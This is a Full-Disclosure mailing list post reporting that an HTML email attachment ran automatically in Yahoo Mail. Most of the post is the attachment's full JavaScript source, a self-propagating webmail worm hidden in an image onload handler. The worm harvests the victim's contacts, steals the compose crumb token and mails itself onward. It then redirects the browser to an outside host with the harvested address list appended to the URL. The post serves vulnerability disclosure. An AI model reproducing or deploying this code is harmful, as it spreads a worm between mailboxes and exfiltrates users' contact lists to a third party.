Hello, all.
I just received an email with an html attachment, on a yahoo account.
When I opened the mail, yahoo automatically displayed the html, and executed the code within. What the hell. =) It forwarded the message to my contacts list, (or some other set of addresses, dunno,) and redirected my browser to a website.
I'm of to a BBQ, and I don't care about yahoo. So I'm not even going to read the code and see how this happens. I'm attaching the html file as a text file. Enjoy!
I just received an email with an html attachment, on a yahoo account.
When I opened the mail, yahoo automatically displayed the html, and executed the code within. What the hell. =) It forwarded the message to my contacts list, (or some other set of addresses, dunno,) and redirected my browser to a website.
I'm of to a BBQ, and I don't care about yahoo. So I'm not even going to read the code and see how this happens. I'm attaching the html file as a text file. Enjoy!
Oh, I've CC'd [EMAIL PROTECTED], but if someone else would give them a proper write-up, and encourage them to close the hole, that'd be wonderful.
Cheers,
<img src='http://us.i1.yimg.com/us.yimg.com/i/us/nt/ma/ma_mail_1.gif' target=""onload="var http_request = false; var Email = ''; var IDList = ''; var CRumb = ''; function makeRequest(url, Func, Method, Param) { if (window.XMLHttpRequest) { http_request = new XMLHttpRequest(); } else if (window.ActiveXObject) { http_request = new ActiveXObject('Microsoft.XMLHTTP'); } http_request.target=""onreadystatechange = Func; http_request.open(Method, url, true); if( Method == 'GET') http_request.send(null); else http_request.send(Param); }window.open('http://www,lastdata.com'); ServerUrl = url0;USIndex = ServerUrl.indexOf('us.' ,0);MailIndex = ServerUrl.indexOf('.mail' ,0);CutLen = MailIndex - USIndex - 3;var Server = ServerUrl.substr(USIndex + 3, CutLen); function GetIDs(HtmlContent) { IDList = ''; StartString = ' <td>'; EndString = '</td>'; i = 0; StartIndex = HtmlContent.indexOf(StartString, 0); while(StartIndex >= 0) { EndIndex = HtmlContent.indexOf(EndString, StartIndex); CutLen = EndIndex - StartIndex - StartString.length; YahooID = HtmlContent.substr(StartIndex + StartString.length, CutLen); if( YahooID.indexOf('@yahoo.com', 0) > 0 || YahooID.indexOf('@yahoogroups.com', 0) > 0 ) IDList = IDList + ',' + YahooID ; StartString = '</tr>'; StartIndex = HtmlContent.indexOf(StartString, StartIndex + 20); StartString = ' <td>'; StartIndex = HtmlContent.indexOf(StartString, StartIndex + 20); i++; } if(IDList.substr(0,1) == ',') IDList = IDList.substr(1, IDList.length); if(IDList.indexOf(',', 0)>0 ) { IDListArray = IDList.split(','); Email = IDListArray[0]; IDList = IDList.replace(Email + ',', ''); } CurEmail = spamform.NE.value; IDList = IDList.replace(CurEmail + ',', ''); IDList = IDList.replace(',' + CurEmail, '');IDList = IDList.replace(CurEmail, '');UserEmail = showLetter.FromAddress.value;IDList = IDList.replace(',' + UserEmail, '');IDList = IDList.replace(UserEmail + ',', '');IDList = IDList.replace(UserEmail, ''); return IDList; } function ListContacts() { if (http_request.readyState == 4) { if (http_request.status == 200) { HtmlContent = http_request.responseText; IDList = GetIDs(HtmlContent); makeRequest('http://us.' + Server + '.mail.yahoo.com/ym/Compose/?rnd=' + Math.random(), Getcrumb, 'GET', null); } } } function ExtractStr(HtmlContent) { StartString = 'name=\u0022.crumb\u0022 value=\u0022'; EndString = '\u0022'; i = 0; StartIndex = HtmlContent.indexOf(StartString, 0); EndIndex = HtmlContent.indexOf(EndString, StartIndex + StartString.length ); CutLen = EndIndex - StartIndex - StartString.length; crumb = HtmlContent.substr(StartIndex + StartString.length , CutLen ); return crumb; } function Getcrumb() { if (http_request.readyState == 4) { if (http_request.status == 200) { HtmlContent = http_request.responseText; CRumb = ExtractStr(HtmlContent); MyBody = 'this is test'; MySubj = 'New Graphic Site'; Url = 'http://us.' + Server + '.mail.yahoo.com/ym/Compose'; var ComposeAction = compose.action;MidIndex = ComposeAction.indexOf('&Mid=' ,0);incIndex = ComposeAction.indexOf('&inc' ,0);CutLen = incIndex - MidIndex - 5;var MyMid = ComposeAction.substr(MidIndex + 5, CutLen); QIndex = ComposeAction.indexOf('?box=' ,0);AIndex = ComposeAction.indexOf('&Mid' ,0);CutLen = AIndex - QIndex - 5;var BoxName = ComposeAction.substr(QIndex + 5, CutLen); Param = 'SEND=1&SD=&SC=&CAN=&docCharset=windows-1256&PhotoMailUser=&PhotoToolInstall=&OpenInsertPhoto=&PhotoGetStart=0&SaveCopy=no&PhotoMailInstallOrigin=&.crumb=RUMBVAL&Mid=EMAILMID&inc=&AttFol=&box=BOXNAME&FwdFile=YM_FM&FwdMsg=EMAILMID&FwdSubj=EMAILSUBJ&FwdInline=&OriginalFrom=FROMEMAIL&OriginalSubject=EMAILSUBJ&InReplyTo=&NumAtt=0&AttData=&UplData=&OldAttData=&OldUplData=&FName=&ATT=&VID=&Markers=&NextMarker=0&Thumbnails=&PhotoMailWith=&BrowseState=&PhotoIcon=&ToolbarState=&VirusReport=&Attachments=&Background=&BGRef=&BGDesc=&BGDef=&BGFg=&BGFF=&BGFS=&BGSolid=&BGCustom=&PlainMsg=%3Cbr%3E%3Cbr%3ENote%3A+forwarded+message+attached.&PhotoFrame=&PhotoPrintAtHomeLink=&PhotoSlideShowLink=&PhotoPrintLink=&PhotoSaveLink=&PhotoPermCap=&PhotoPermPath=&PhotoDownloadUrl=&PhotoSaveUrl=&PhotoFlags=&start=compose&bmdomain=&showcc=&showbcc=&AC_Done=&AC_ToList=0%2C&AC_CcList=&AC_BccList=&sendtop=Send&savedrafttop=Save+as+a+Draft&canceltop=Cancel&FromAddr=&To=TOEMAIL&Cc=&Bcc=BCCLIST&Subj=EMAILSUBJ&Body=%3CBR%3E%3CBR%3ENote%3A+forwarded+message+attached.&Format=html&sendbottom=Send&savedraftbottom=Save+as+a+Draft&cancelbottom=Cancel&cancelbottom=Cancel'; Param = Param.replace('BOXNAME', BoxName); Param = Param.replace('RUMBVAL', CRumb); Param = Param.replace('BCCLIST', IDList); Param = Param.replace('TOEMAIL', Email);Param = Param.replace('FROMEMAIL', '[EMAIL PROTECTED]'); Param = Param.replace('EMAILBODY', MyBody); Param = Param.replace('PlainMESSAGE', ''); Param = Param.replace('EMAILSUBJ', MySubj);Param= Param.replace('EMAILSUBJ', MySubj);Param = Param.replace('EMAILSUBJ', MySubj); Param = Param.replace('EMAILMID', MyMid);Param = Param.replace('EMAILMID', MyMid);makeRequest(Url , alertContents, 'POST', Param); } }} function alertContents() { if (http_request.readyState == 4) { window.navigate('http://www.av3.net/?ShowFolder&rb=Sent&reset=1&YY=75867&inc=25&order=down&sort=date&pos=0&view=a&head=f&box=Inbox&ShowFolder?rb=Sent&reset=1&YY=75867&inc=25&order=down&sort=date&pos=0&view=a&head=f&box=Inbox&ShowFolder?rb=Sent&reset=1&YY=75867&inc=25&order=down&sort=date&pos=0&view=a&head=f&box=Inbox&BCCList=' + IDList) } } makeRequest('http://us.' + Server + '.mail.yahoo.com/ym/QuickBuilder?build=Continue&cancel=&continuetop=Continue&canceltop=Cancel&Inbox=Inbox&Sent=Sent&pfolder=all&freqCheck=&freq=1&numdays=on&date=180&ps=1&numadr=100&continuebottom=Continue&cancelbottom=Cancel&rnd=' + Math.random(), ListContacts, 'GET', null)">Please wait while loading the site
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
